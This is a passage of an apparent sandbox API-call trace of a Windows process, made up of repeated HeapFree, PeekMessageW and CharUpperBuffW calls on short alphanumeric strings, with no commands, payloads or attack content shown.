lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0259.096] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.097] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.097] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.097] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.097] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.097] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.097] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.098] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.098] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.099] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.099] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.101] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.101] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.102] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.102] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.102] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.102] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.102] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.102] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.102] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.103] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.103] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0259.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 